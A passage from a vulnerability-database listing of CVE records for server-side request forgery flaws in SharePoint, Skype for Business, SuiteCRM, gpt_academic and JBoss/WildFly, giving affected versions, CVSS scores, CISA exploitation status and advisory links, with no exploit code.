"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en-US",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en-US",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-10T16:38:57.295Z",
"orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
"shortName": "microsoft"
},
"references": [
{
"name": "Microsoft SharePoint Server Information Disclosure Vulnerability",
"tags": [
"vendor-advisory"
],
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24954"
}
],
"title": "Microsoft SharePoint Server Information Disclosure Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
"assignerShortName": "microsoft",
"cveId": "CVE-2023-24954",
"datePublished": "2023-05-09T17:03:01.327Z",
"dateReserved": "2023-01-31T20:37:47.263Z",
"dateUpdated": "2025-07-10T16:38:57.295Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-41763 (GCVE-0-2023-41763)
Vulnerability from cvelistv5
Published
2023-10-10 17:07
Modified
2025-07-30 01:37
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
Skype for Business Elevation of Privilege Vulnerability
References
| ▼ | URL | Tags |
|---|---|---|
| https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763 | vendor-advisory |
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| ▼ | Microsoft | Skype for Business Server 2015 CU13 |
Version: 9319.0 < 6.0.9319.869 |
||||||
|
|||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-41763",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-16T20:26:59.238274Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2023-10-10",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-41763"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-30T01:37:14.614Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"timeline": [
{
"lang": "en",
"time": "2023-10-10T00:00:00+00:00",
"value": "CVE-2023-41763 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:09:47.991Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "Skype for Business Elevation of Privilege Vulnerability",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"platforms": [
"Unknown"
],
"product": "Skype for Business Server 2015 CU13",
"vendor": "Microsoft",
"versions": [
{
"lessThan": "6.0.9319.869",
"status": "affected",
"version": "9319.0",
"versionType": "custom"
}
]
},
{
"platforms": [
"Unknown"
],
"product": "Skype for Business Server 2019 CU7",
"vendor": "Microsoft",
"versions": [
{
"lessThan": "7.0.246.530",
"status": "affected",
"version": "2046.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:skype_for_business_server:*:cu13:*:*:*:*:*:*",
"versionEndExcluding": "6.0.9319.869",
"versionStartIncluding": "9319.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:skype_for_business_server:*:cu7:*:*:*:*:*:*",
"versionEndExcluding": "7.0.246.530",
"versionStartIncluding": "2046.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"datePublic": "2023-10-10T07:00:00.000Z",
"descriptions": [
{
"lang": "en-US",
"value": "Skype for Business Elevation of Privilege Vulnerability"
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en-US",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en-US",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-14T22:45:50.701Z",
"orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
"shortName": "microsoft"
},
"references": [
{
"name": "Skype for Business Elevation of Privilege Vulnerability",
"tags": [
"vendor-advisory"
],
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763"
}
],
"title": "Skype for Business Elevation of Privilege Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
"assignerShortName": "microsoft",
"cveId": "CVE-2023-41763",
"datePublished": "2023-10-10T17:07:24.950Z",
"dateReserved": "2023-08-31T23:08:32.064Z",
"dateUpdated": "2025-07-30T01:37:14.614Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6388 (GCVE-0-2023-6388)
Vulnerability from cvelistv5
Published
2024-02-07 02:47
Modified
2025-09-29 18:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
Suite CRM version 7.14.2 allows making arbitrary HTTP requests through
the vulnerable server. This is possible because the application is vulnerable
to SSRF.
References
| ▼ | URL | Tags |
|---|---|---|
| https://fluidattacks.com/advisories/leon/ | third-party-advisory | |
| https://github.com/salesagility/SuiteCRM/ | product | |
| https://docs.suitecrm.com/admin/releases/7.14.x/#_7_14_4 | patch |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6388",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-07T16:21:56.230019Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:39.515Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:28:21.783Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://fluidattacks.com/advisories/leon/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/salesagility/SuiteCRM/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Suite CRM",
"vendor": "Suite CRM",
"versions": [
{
"status": "affected",
"version": "7.14.2"
}
]
}
],
"datePublic": "2024-02-07T02:43:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cdiv\u003eSuite CRM version 7.14.2 allows making arbitrary HTTP requests through\u003c/div\u003e\u003cdiv\u003ethe vulnerable server. This is possible because the application is vulnerable\u003c/div\u003e\u003cdiv\u003eto SSRF.\u003c/div\u003e\u003c/div\u003e\u003cbr\u003e"
}
],
"value": "Suite CRM version 7.14.2 allows making arbitrary HTTP requests through\n\nthe vulnerable server. This is possible because the application is vulnerable\n\nto SSRF."
}
],
"impacts": [
{
"capecId": "CAPEC-300",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-300 Port Scanning"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T18:05:47.532Z",
"orgId": "84fe0718-d6bb-4716-a7e8-81a6d1daa869",
"shortName": "Fluid Attacks"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://fluidattacks.com/advisories/leon/"
},
{
"tags": [
"product"
],
"url": "https://github.com/salesagility/SuiteCRM/"
},
{
"tags": [
"patch"
],
"url": "https://docs.suitecrm.com/admin/releases/7.14.x/#_7_14_4"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Suite CRM v7.14.2 - SSRF",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "84fe0718-d6bb-4716-a7e8-81a6d1daa869",
"assignerShortName": "Fluid Attacks",
"cveId": "CVE-2023-6388",
"datePublished": "2024-02-07T02:47:59.391Z",
"dateReserved": "2023-11-29T18:12:28.111Z",
"dateUpdated": "2025-09-29T18:05:47.532Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-11031 (GCVE-0-2024-11031)
Vulnerability from cvelistv5
Published
2025-03-20 10:09
Modified
2025-07-15 10:48
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
In version 3.83 of binary-husky/gpt_academic, a Server-Side Request Forgery (SSRF) vulnerability exists in the Markdown_Translate.get_files_from_everything() API. This vulnerability is exploited through the HotReload(Markdown翻译中) plugin function, which allows downloading arbitrary web hosts by only checking if the link starts with 'http'. Attackers can exploit this vulnerability to abuse the victim GPT Academic's Gradio Web server's credentials to access unauthorized web resources.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| binary-husky | binary-husky/gpt_academic |
Version: unspecified < |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-11031",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-20T17:51:25.416890Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-20T18:57:02.072Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "binary-husky/gpt_academic",
"vendor": "binary-husky",
"versions": [
{
"lessThanOrEqual": "latest",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In version 3.83 of binary-husky/gpt_academic, a Server-Side Request Forgery (SSRF) vulnerability exists in the Markdown_Translate.get_files_from_everything() API. This vulnerability is exploited through the HotReload(Markdown\u7ffb\u8bd1\u4e2d) plugin function, which allows downloading arbitrary web hosts by only checking if the link starts with \u0027http\u0027. Attackers can exploit this vulnerability to abuse the victim GPT Academic\u0027s Gradio Web server\u0027s credentials to access unauthorized web resources."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-15T10:48:56.680Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntr_ai"
},
"references": [
{
"url": "https://huntr.com/bounties/d27d89a7-7d54-45b9-a9eb-66c00bc56e02"
}
],
"source": {
"advisory": "d27d89a7-7d54-45b9-a9eb-66c00bc56e02",
"discovery": "EXTERNAL"
},
"title": "SSRF in binary-husky/gpt_academic"
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntr_ai",
"cveId": "CVE-2024-11031",
"datePublished": "2025-03-20T10:09:16.417Z",
"dateReserved": "2024-11-08T21:31:03.471Z",
"dateUpdated": "2025-07-15T10:48:56.680Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-1233 (GCVE-0-2024-1233)
Vulnerability from cvelistv5
Published
2024-04-09 07:01
Modified
2025-09-16 00:00
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.
References
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| ▼ |
Version: 0 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:33:25.381Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:3559",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3559"
},
{
"name": "RHSA-2024:3560",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3560"
},
{
"name": "RHSA-2024:3561",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3561"
},
{
"name": "RHSA-2024:3563",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3563"
},
{
"name": "RHSA-2024:3580",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3580"
},
{
"name": "RHSA-2024:3581",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3581"
},
{
"name": "RHSA-2024:3583",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3583"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-1233"
},
{
"name": "RHBZ#2262849",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262849"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/advisories/GHSA-v4mm-q8fv-r2w5"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/wildfly/wildfly/pull/17812/commits/0c02350bc0d84287bed46e7c32f90b36e50d3523"
},
{
"tags": [
"x_transferred"
],
"url": "https://issues.redhat.com/browse/WFLY-19226"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-1233",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-09T19:46:50.360202Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-22T20:09:07.144Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://github.com/wildfly/wildfly",
"defaultStatus": "unaffected",
"packageName": "wildfly",
"versions": [
{
"lessThan": "32.0.0.Final",
"status": "affected",
"version": "0",
"versionType": "maven"
}
]
},
{
"collectionURL": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4"
],
"defaultStatus": "unaffected",
"packageName": "eap",
"product": "Important: Red Hat JBoss Enterprise Application Platform 7.4.17 Security update",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-glassfish-el",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.0.1-4.b08_redhat_00005.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-hibernate",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.1.17-3.Final_redhat_00004.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-databind",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.8.11.6-3.SP1_redhat_00003.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-ejb-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.0.12-1.Final_redhat_00002.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-netty",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.1.63-2.Final_redhat_00003.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-undertow",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.4.18-16.SP14_redhat_00001.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:7.1.11-4.GA_redhat_00002.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.1.14-1.Final_redhat_00001.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-http-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.0.21-1.Final_redhat_00001.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-naming-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.0.13-1.Final_redhat_00001.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-openssl",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.0.12-1.Final_redhat_00001.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.1::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-openssl-linux",
"product": "Red Hat JBoss Enterprise Application Platform 7.1 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.0.12-6.Final_redhat_00001.1.ep7.el7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-annotations",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.10.4-3.redhat_00006.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-core",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.10.4-3.redhat_00006.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-databind",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.10.4-5.redhat_00006.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-jaxrs-providers",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.10.4-3.redhat_00006.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-modules-base",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.10.4-5.redhat_00006.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jackson-modules-java8",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.10.4-2.redhat_00006.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-server-migration",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.7.2-16.Final_redhat_00017.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-netty",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.1.63-5.Final_redhat_00003.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-undertow",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.0.41-4.SP5_redhat_00001.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:7.3.14-3.GA_redhat_00002.1.el7eap",
"versionType": "rpm"
}
]
},
